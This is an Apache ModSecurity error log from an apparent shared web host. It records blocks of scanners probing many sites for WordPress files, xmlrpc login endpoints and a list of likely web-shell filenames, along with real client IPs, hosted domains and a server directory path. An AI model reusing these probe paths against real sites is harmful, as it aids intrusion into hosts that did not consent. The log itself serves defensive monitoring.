[Tue May 26 16:36:29.451702 2026] [security2:error] [pid 808625:tid 808833] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-szEl_SBaWibfDmpocgAAAE4"]
[Tue May 26 16:36:30.423049 2026] [security2:error] [pid 808625:tid 808859] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-tDEl_SBaWibfDmpojQAAAGg"]
[Tue May 26 16:36:30.672432 2026] [security2:error] [pid 808625:tid 808775] [client 4.204.220.190:26919] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV-tjEl_SBaWibfDmporwAAABQ"]
[Tue May 26 16:36:31.229650 2026] [security2:error] [pid 808625:tid 808845] [client 4.204.220.190:42599] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-admin/js/"] [unique_id "ahV-tzEl_SBaWibfDmpovgAAAFo"]
[Tue May 26 16:36:31.328574 2026] [security2:error] [pid 808625:tid 808869] [client 4.204.220.190:26919] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV-tzEl_SBaWibfDmpovwAAAHI"]
[Tue May 26 16:36:31.565142 2026] [security2:error] [pid 808625:tid 808858] [client 4.204.220.190:42599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahV-tzEl_SBaWibfDmpowQAAAGc"]
[Tue May 26 16:36:31.565231 2026] [security2:error] [pid 808625:tid 808858] [client 4.204.220.190:42599] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahV-tzEl_SBaWibfDmpowQAAAGc"]
[Tue May 26 16:36:32.371958 2026] [security2:error] [pid 808625:tid 808769] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-tjEl_SBaWibfDmporgAAAA4"]
[Tue May 26 16:36:32.953209 2026] [security2:error] [pid 808625:tid 808819] [client 4.204.220.190:23906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahV-uDEl_SBaWibfDmpo4AAAAEA"]
[Tue May 26 16:36:32.953349 2026] [security2:error] [pid 808625:tid 808819] [client 4.204.220.190:23906] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahV-uDEl_SBaWibfDmpo4AAAAEA"]
[Tue May 26 16:36:34.523213 2026] [security2:error] [pid 808625:tid 808799] [client 4.204.220.190:42570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahV-ujEl_SBaWibfDmpo-gAAACw"]
[Tue May 26 16:36:34.523329 2026] [security2:error] [pid 808625:tid 808799] [client 4.204.220.190:42570] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahV-ujEl_SBaWibfDmpo-gAAACw"]
[Tue May 26 16:36:34.865618 2026] [security2:error] [pid 808625:tid 808797] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-uTEl_SBaWibfDmpo4wAAACo"]
[Tue May 26 16:36:35.170723 2026] [security2:error] [pid 808625:tid 808793] [client 4.204.220.190:23881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahV-uzEl_SBaWibfDmppBgAAACY"]
[Tue May 26 16:36:35.170842 2026] [security2:error] [pid 808625:tid 808793] [client 4.204.220.190:23881] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahV-uzEl_SBaWibfDmppBgAAACY"]
[Tue May 26 16:36:36.322360 2026] [security2:error] [pid 808625:tid 808854] [client 4.204.220.190:12881] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahV-vDEl_SBaWibfDmppFgAAAGM"]
[Tue May 26 16:36:36.358784 2026] [security2:error] [pid 808625:tid 808837] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ujEl_SBaWibfDmppBQAAAFI"]
[Tue May 26 16:36:37.611967 2026] [security2:error] [pid 808625:tid 808627] [remote 74.7.241.58:38228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV-vTEl_SBaWibfDmppNwAAWQE"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:36:37.686169 2026] [security2:error] [pid 808625:tid 808869] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-vDEl_SBaWibfDmppHgAAAHI"]
[Tue May 26 16:36:37.930153 2026] [security2:error] [pid 808625:tid 808814] [client 4.204.220.190:33831] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV-vTEl_SBaWibfDmppPAAAADs"]
[Tue May 26 16:36:38.041692 2026] [security2:error] [pid 808625:tid 808782] [client 4.204.220.190:12881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahV-vjEl_SBaWibfDmppPQAAABs"]
[Tue May 26 16:36:38.041828 2026] [security2:error] [pid 808625:tid 808782] [client 4.204.220.190:12881] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahV-vjEl_SBaWibfDmppPQAAABs"]
[Tue May 26 16:36:38.587745 2026] [security2:error] [pid 808625:tid 808769] [client 117.198.37.168:61019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-vjEl_SBaWibfDmppQgAAAA4"]
[Tue May 26 16:36:38.587870 2026] [security2:error] [pid 808625:tid 808769] [client 117.198.37.168:61019] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-vjEl_SBaWibfDmppQgAAAA4"]
[Tue May 26 16:36:39.279044 2026] [security2:error] [pid 808625:tid 808775] [client 4.204.220.190:12289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahV-vzEl_SBaWibfDmppUwAAABQ"]
[Tue May 26 16:36:39.279173 2026] [security2:error] [pid 808625:tid 808775] [client 4.204.220.190:12289] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahV-vzEl_SBaWibfDmppUwAAABQ"]
[Tue May 26 16:36:39.844936 2026] [security2:error] [pid 808625:tid 808765] [client 4.204.220.190:23019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahV-vzEl_SBaWibfDmppZAAAAAo"]
[Tue May 26 16:36:39.845099 2026] [security2:error] [pid 808625:tid 808765] [client 4.204.220.190:23019] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahV-vzEl_SBaWibfDmppZAAAAAo"]
[Tue May 26 16:36:39.976131 2026] [security2:error] [pid 808625:tid 808882] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-vzEl_SBaWibfDmppUgAAAH8"]
[Tue May 26 16:36:40.618086 2026] [security2:error] [pid 808625:tid 808842] [client 85.208.96.204:15836] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/2/"] [unique_id "ahV-wDEl_SBaWibfDmppdwAAAFc"]
[Tue May 26 16:36:40.618331 2026] [security2:error] [pid 808625:tid 808842] [client 85.208.96.204:15836] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/2/"] [unique_id "ahV-wDEl_SBaWibfDmppdwAAAFc"]
[Tue May 26 16:36:40.715163 2026] [security2:error] [pid 808625:tid 808816] [client 4.204.220.190:23003] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahV-wDEl_SBaWibfDmppfQAAAD0"]
[Tue May 26 16:36:40.715322 2026] [security2:error] [pid 808625:tid 808816] [client 4.204.220.190:23003] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahV-wDEl_SBaWibfDmppfQAAAD0"]
[Tue May 26 16:36:41.259251 2026] [security2:error] [pid 808625:tid 808797] [client 2.58.56.163:61924] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahV-wTEl_SBaWibfDmppwAAAACo"]
[Tue May 26 16:36:41.783433 2026] [security2:error] [pid 808625:tid 808810] [client 4.204.220.190:33836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahV-wTEl_SBaWibfDmppywAAADc"]
[Tue May 26 16:36:41.783527 2026] [security2:error] [pid 808625:tid 808810] [client 4.204.220.190:33836] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahV-wTEl_SBaWibfDmppywAAADc"]
[Tue May 26 16:36:41.849360 2026] [security2:error] [pid 808625:tid 808846] [client 2.58.56.163:58144] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV-wTEl_SBaWibfDmppzwAAAFs"]
[Tue May 26 16:36:41.967979 2026] [security2:error] [pid 808625:tid 808781] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-wTEl_SBaWibfDmppigAAABo"]
[Tue May 26 16:36:42.210047 2026] [security2:error] [pid 808625:tid 808774] [client 2.58.56.163:65031] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahV-wjEl_SBaWibfDmpp1QAAABM"]
[Tue May 26 16:36:42.502416 2026] [security2:error] [pid 808625:tid 808820] [client 2.58.56.163:54296] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahV-wjEl_SBaWibfDmpp5gAAAEE"]
[Tue May 26 16:36:42.798415 2026] [security2:error] [pid 808625:tid 808799] [client 2.58.56.163:50118] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV-wjEl_SBaWibfDmpp8gAAACw"]
[Tue May 26 16:36:42.858369 2026] [security2:error] [pid 808625:tid 808768] [client 4.204.220.190:12290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-admin/css/"] [unique_id "ahV-wjEl_SBaWibfDmpp9AAAAA0"]
[Tue May 26 16:36:42.933050 2026] [security2:error] [pid 808625:tid 808872] [client 4.204.220.190:33831] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV-wjEl_SBaWibfDmpp-AAAAHU"]
[Tue May 26 16:36:43.006717 2026] [security2:error] [pid 808625:tid 808875] [client 4.204.220.190:12290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/x/"] [unique_id "ahV-wzEl_SBaWibfDmpp-QAAAHg"]
[Tue May 26 16:36:43.082514 2026] [security2:error] [pid 808625:tid 808825] [client 2.58.56.163:53058] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahV-wzEl_SBaWibfDmpp_QAAAEY"]
[Tue May 26 16:36:43.235548 2026] [security2:error] [pid 808625:tid 808864] [client 4.204.220.190:33831] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV-wzEl_SBaWibfDmpqBQAAAG0"]
[Tue May 26 16:36:43.311274 2026] [security2:error] [pid 808625:tid 808859] [client 4.204.220.190:12290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/modern/"] [unique_id "ahV-wzEl_SBaWibfDmpqBwAAAGg"]
[Tue May 26 16:36:43.382745 2026] [security2:error] [pid 808625:tid 808823] [client 2.58.56.163:64044] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahV-wzEl_SBaWibfDmpqCAAAAEQ"]
[Tue May 26 16:36:43.413491 2026] [security2:error] [pid 808625:tid 808828] [client 4.204.220.190:33831] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV-wzEl_SBaWibfDmpqDQAAAEk"]
[Tue May 26 16:36:43.710161 2026] [security2:error] [pid 808625:tid 808784] [client 2.58.56.163:50479] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahV-wzEl_SBaWibfDmpqFgAAAB0"]
[Tue May 26 16:36:43.784847 2026] [security2:error] [pid 808625:tid 808764] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-wzEl_SBaWibfDmpqAQAAAAk"]
[Tue May 26 16:36:43.802292 2026] [security2:error] [pid 808625:tid 808815] [client 4.204.220.190:12290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahV-wzEl_SBaWibfDmpqFwAAADw"]
[Tue May 26 16:36:43.802412 2026] [security2:error] [pid 808625:tid 808815] [client 4.204.220.190:12290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahV-wzEl_SBaWibfDmpqFwAAADw"]
[Tue May 26 16:36:44.013687 2026] [security2:error] [pid 808625:tid 808757] [client 2.58.56.163:51728] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahV-xDEl_SBaWibfDmpqHAAAAAI"]
[Tue May 26 16:36:44.319375 2026] [security2:error] [pid 808625:tid 808844] [client 2.58.56.163:52203] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahV-xDEl_SBaWibfDmpqJgAAAFk"]
[Tue May 26 16:36:44.608964 2026] [security2:error] [pid 808625:tid 808865] [client 4.204.220.190:20372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahV-xDEl_SBaWibfDmpqLQAAAG4"]
[Tue May 26 16:36:44.609100 2026] [security2:error] [pid 808625:tid 808865] [client 4.204.220.190:20372] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahV-xDEl_SBaWibfDmpqLQAAAG4"]
[Tue May 26 16:36:44.618823 2026] [security2:error] [pid 808625:tid 808799] [client 2.58.56.163:60907] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahV-xDEl_SBaWibfDmpqLgAAACw"]
[Tue May 26 16:36:44.650039 2026] [security2:error] [pid 808625:tid 808805] [client 128.140.41.193:8512] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV-xDEl_SBaWibfDmpqLwAAADI"], referer: https://thegoodsporting.com
[Tue May 26 16:36:44.911754 2026] [security2:error] [pid 808625:tid 808864] [client 2.58.56.163:60286] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahV-xDEl_SBaWibfDmpqOQAAAG0"]
[Tue May 26 16:36:45.230833 2026] [security2:error] [pid 808625:tid 808849] [client 2.58.56.163:50003] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.pronumbers.com.au"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahV-xTEl_SBaWibfDmpqPgAAAF4"]
[Tue May 26 16:36:45.731821 2026] [security2:error] [pid 808625:tid 808787] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-xTEl_SBaWibfDmpqPAAAACA"]
[Tue May 26 16:36:45.880247 2026] [security2:error] [pid 808625:tid 808767] [client 4.204.220.190:43202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahV-xTEl_SBaWibfDmpqTQAAAAw"]
